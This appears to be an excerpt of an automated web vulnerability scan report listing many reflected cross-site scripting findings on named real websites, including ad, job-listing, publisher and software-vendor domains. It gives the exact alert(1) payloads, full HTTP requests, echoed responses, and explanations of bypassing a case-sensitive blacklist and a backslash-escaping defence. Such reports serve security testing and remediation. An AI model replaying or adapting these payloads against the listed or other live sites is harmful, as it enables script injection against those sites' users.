The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3da81"-alert(1)-"46d128fdaa7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai3da81"-alert(1)-"46d128fdaa7/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.glb.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab625"-alert(1)-"aa949ccf2f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /nai/daa.phpab625"-alert(1)-"aa949ccf2f2?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=4384129 HTTP/1.1 Host: nai.glb.adtechus.com Proxy-Connection: keep-alive Referer: http://advertising.aol.com/nai/nai.php?action_id=3 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JEB2=NOID; OptOut=we will not set any more cookies
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21de7"-alert(1)-"6a8ac96c613 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68e25"-alert(1)-"baa99d8e6dc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 27cec<script>alert(1)</script>80cc05fcd82 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ARTICLESEARCHQUERY_PARSER request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fa5e"><ScRiPt>alert(1)</ScRiPt>3426fe2fa5b was submitted in the ARTICLESEARCHQUERY_PARSER parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of the KEYWORDS request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 548bc\'%3balert(1)//c810fc9d02f was submitted in the KEYWORDS parameter. This input was echoed as 548bc\\';alert(1)//c810fc9d02f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.
The value of the fields request parameter is copied into the HTML document as plain text between tags. The payload 510d8<a>fae801ceba6 was submitted in the fields parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tools/XM01?queryid=QJ33020&fields=symbol%20rsrrank510d8<a>fae801ceba6&symbol=IYM HTTP/1.1 Host: orbisadvisors.redinews.com Proxy-Connection: keep-alive Referer: http://stockoodles.com/v1/MTSNew.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the JobId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a3290"%3ba31635da494 was submitted in the JobId parameter. This input was echoed as a3290";a31635da494 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the SourcePage request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8f34f'-alert(1)-'dfa765092f0 was submitted in the SourcePage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/129605/AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations?SourcePage=Jobsearch8f34f'-alert(1)-'dfa765092f0&JobId=129605&JobName=AT-amp-T-Leadership-Development-Fulltime-Program-GR-Various-Locations'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/ ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9bb54'%3bfca5fe2f801 was submitted in the REST URL parameter 2. This input was echoed as 9bb54';fca5fe2f801 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db32d'-alert(1)-'f634657a8f4 was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDdb32d'-alert(1)-'f634657a8f4&JobId=131547&JobName=SiteManagement-Trainee'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)!='undefine ...[SNIP]...
1.105. http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sales-jobs.fins.com
Path:
/Jobs/131547/SiteManagement-Trainee
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7d15'-alert(1)-'b16f3950789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f7d15'-alert(1)-'b16f3950789=1&JobId=131547&JobName=SiteManagement-Trainee'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)!='undefi ...[SNIP]...
The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f134'-alert(1)-'f9c84c54baf was submitted in the reflink parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131547/SiteManagement-Trainee?reflink=djm_modulewsj_widgetjobs_jobsatdmedia3f134'-alert(1)-'f9c84c54baf&cobrand=ATD&JobId=131547&JobName=SiteManagement-Trainee'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script ...[SNIP]...
The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d412c'-alert(1)-'1cf6036fd5b was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATDd412c'-alert(1)-'1cf6036fd5b&JobId=131750&JobName=Acct-Exec-Small-Business-Sales'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)!=' ...[SNIP]...
1.108. http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://sales-jobs.fins.com
Path:
/Jobs/131750/Acct-Exec-Small-Business-Sales
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6112'-alert(1)-'19d36ec284c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&f6112'-alert(1)-'19d36ec284c=1&JobId=131750&JobName=Acct-Exec-Small-Business-Sales'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(OB_Script)! ...[SNIP]...
The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 156da'-alert(1)-'1fcb5beb4d8 was submitted in the reflink parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/131750/Acct-Exec-Small-Business-Sales?reflink=djm_modulewsj_widgetjobs_jobsatdmedia156da'-alert(1)-'1fcb5beb4d8&cobrand=ATD&JobId=131750&JobName=Acct-Exec-Small-Business-Sales'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(O ...[SNIP]...
The value of the cobrand request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ec4b'-alert(1)-'adbf5650abc was submitted in the cobrand parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD7ec4b'-alert(1)-'adbf5650abc&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof(O ...[SNIP]...
1.111. http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b923c'-alert(1)-'c322821b1b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia&cobrand=ATD&b923c'-alert(1)-'c322821b1b3=1&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; if ( typeof ...[SNIP]...
The value of the reflink request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95428'-alert(1)-'c228a9bf103 was submitted in the reflink parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="ctl00_Head1"><title> ...[SNIP]... <script type="text/JavaScript"> var OB_permalink = 'http://sales-jobs.fins.com/Jobs/134401/AT-T-Application-Sales-Executive-3-PCG-MAC?reflink=djm_modulewsj_widgetjobs_jobsatdmedia95428'-alert(1)-'c228a9bf103&cobrand=ATD&JobId=134401&JobName=AT-T-Application-Sales-Executive-3-PCG-MAC'; var OB_Template="fins"; var OB_widgetId = 'SB_1'; //'AR_1'; var OB_langJS ='http://widgets.outbrain.com/lang_en.js'; i ...[SNIP]...
The value of the jsoncallback request parameter is copied into the HTML document as plain text between tags. The payload 3f0cf<a>e90c4a69c92 was submitted in the jsoncallback parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3baae"%3balert(1)//18e3cd7c00e was submitted in the pt parameter. This input was echoed as 3baae";alert(1)//18e3cd7c00e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /widgets/subscription/default.aspx?sid=2&pt=nl3baae"%3balert(1)//18e3cd7c00e&pv=N42&dn=default HTTP/1.1 Host: services.harpercollins.com Proxy-Connection: keep-alive Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the pv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6040d"%3balert(1)//c2ca12fcdf3 was submitted in the pv parameter. This input was echoed as 6040d";alert(1)//c2ca12fcdf3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /widgets/subscription/default.aspx?sid=2&pt=nl&pv=N426040d"%3balert(1)//c2ca12fcdf3&dn=default HTTP/1.1 Host: services.harpercollins.com Proxy-Connection: keep-alive Referer: http://www.harpercollins.com/books/Protecting-Your-Parents-Money-Jeff-D-Opdyke?isbn=9780061358203&HCHP=TB_Protecting+Your+Parents++Money User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f773"%3balert(1)//ee38c3c5290 was submitted in the mid parameter. This input was echoed as 2f773";alert(1)//ee38c3c5290 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pt request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 24aec%3balert(1)//c4608435b21 was submitted in the pt parameter. This input was echoed as 24aec;alert(1)//c4608435b21 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
//Widget variable declarations var WidgetId2nl24aec;alert(1)//c4608435b21n42default = 99; var SiteId2nl24aec;alert(1)//c4608435b21n42default = 2; var ProgramType2nl24aec;alert(1)//c4608435b21n42default = "nl"; var ProgramValue2nl24aec;alert(1)//c4 ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript rest-of-line comment. The payload f1c69%0aalert(1)//6c8b0e2d7df was submitted in the pt parameter. This input was echoed as f1c69 alert(1)//6c8b0e2d7df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
document.write("<font class=\"fontGlobal2nlf1c69 alert(1)//6c8b0e2d7dfn42default\"><div id=\"divHCWidgetHead2nlf1c69 alert(1)//6c8b0e2d7dfn42default\"></div>"); document.write("<div ...[SNIP]... 42default = "Sign me up to receive news about books that explore biography, memoir, history, politics and more."; var strProgramText2nlf1c69 alert(1)//6c8b0e2d7dfn42default = GetProgramText2nlf1c69 alert(1)//6c8b0e2d7dfn42default("Notable Nonfiction", "nl"); var strProgramType2nlf1c69 alert(1)//6c8b0e2d7dfn42default = GetProgramType2nlf1c69 alert(1)//6c8b0e2d7dfn42default("nl"); var iCurrentState2nl ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8a6"%3balert(1)//38558cd33d2 was submitted in the pt parameter. This input was echoed as 1f8a6";alert(1)//38558cd33d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pv request parameter is copied into a JavaScript rest-of-line comment. The payload 69597%0aalert(1)//11e60e246fb was submitted in the pv parameter. This input was echoed as 69597 alert(1)//11e60e246fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pv request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 49a73%3balert(1)//ca8a8f2ac10 was submitted in the pv parameter. This input was echoed as 49a73;alert(1)//ca8a8f2ac10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
//Widget variable declarations var WidgetId2at3282849a73;alert(1)//ca8a8f2ac10default = 69; var SiteId2at3282849a73;alert(1)//ca8a8f2ac10default = 2; var ProgramType2at3282849a73;alert(1)//ca8a8f2ac10default = "at"; var ProgramValue2at3282849a73;alert( ...[SNIP]...
The value of the pv request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f251e"%3balert(1)//83887f6d667 was submitted in the pv parameter. This input was echoed as f251e";alert(1)//83887f6d667 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 2nd AMF string parameter is copied into the HTML document as plain text between tags. The payload 8850a<script>alert(1)</script>4dcd5ba057e was submitted in the 2nd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 58f06<script>alert(1)</script>98b93e06103 was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
......AppendToGatewayUrl....(..%?PHPSESSID=gio9fstslhuds6gf6pfqns7ie1..../2/onStatus..null..... .Iflex.messaging.messages.ErrorMessage.correlationId.I61A9427B-C408-65D3-7F57-44F2D2FA737D.faultCode.5AM ...[SNIP]... /v1/market/amfphp/core/shared/app/BasicActions.php on line 25.faultString..AThe classpath folder {/mnt/stor10-wc2-dfw1/577993/www.stockoodles.com/web/content/v1/market/amfphp/services/BasicUtilsService58f06<script>alert(1)</script>98b93e06103.php} does not exist. You probably misplaced your service..
The value of the 4th AMF string parameter is copied into the HTML document as plain text between tags. The payload c8ab3<script>alert(1)</script>ed4afefc687 was submitted in the 4th AMF string parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f29a7<script>alert(1)</script>178e29b8bea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d35f0<script>alert(1)</script>ba7454ce186 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US"> <hea ...[SNIP]... <p>Page /ci/redirect/enduserd35f0<script>alert(1)</script>ba7454ce186/enduser/ask.php?p_sid=bw7EGuDk not found.</p> ...[SNIP]...
1.128. http://updates.webroot.com/autorenewal/auto_renewal_optout.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://updates.webroot.com
Path:
/autorenewal/auto_renewal_optout.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41245"><script>alert(1)</script>426159b056e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 121f5<script>alert(1)</script>5cffe219be1 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3196c<script>alert(1)</script>7f76aab143d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d7c"-alert(1)-"1cc2458db2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
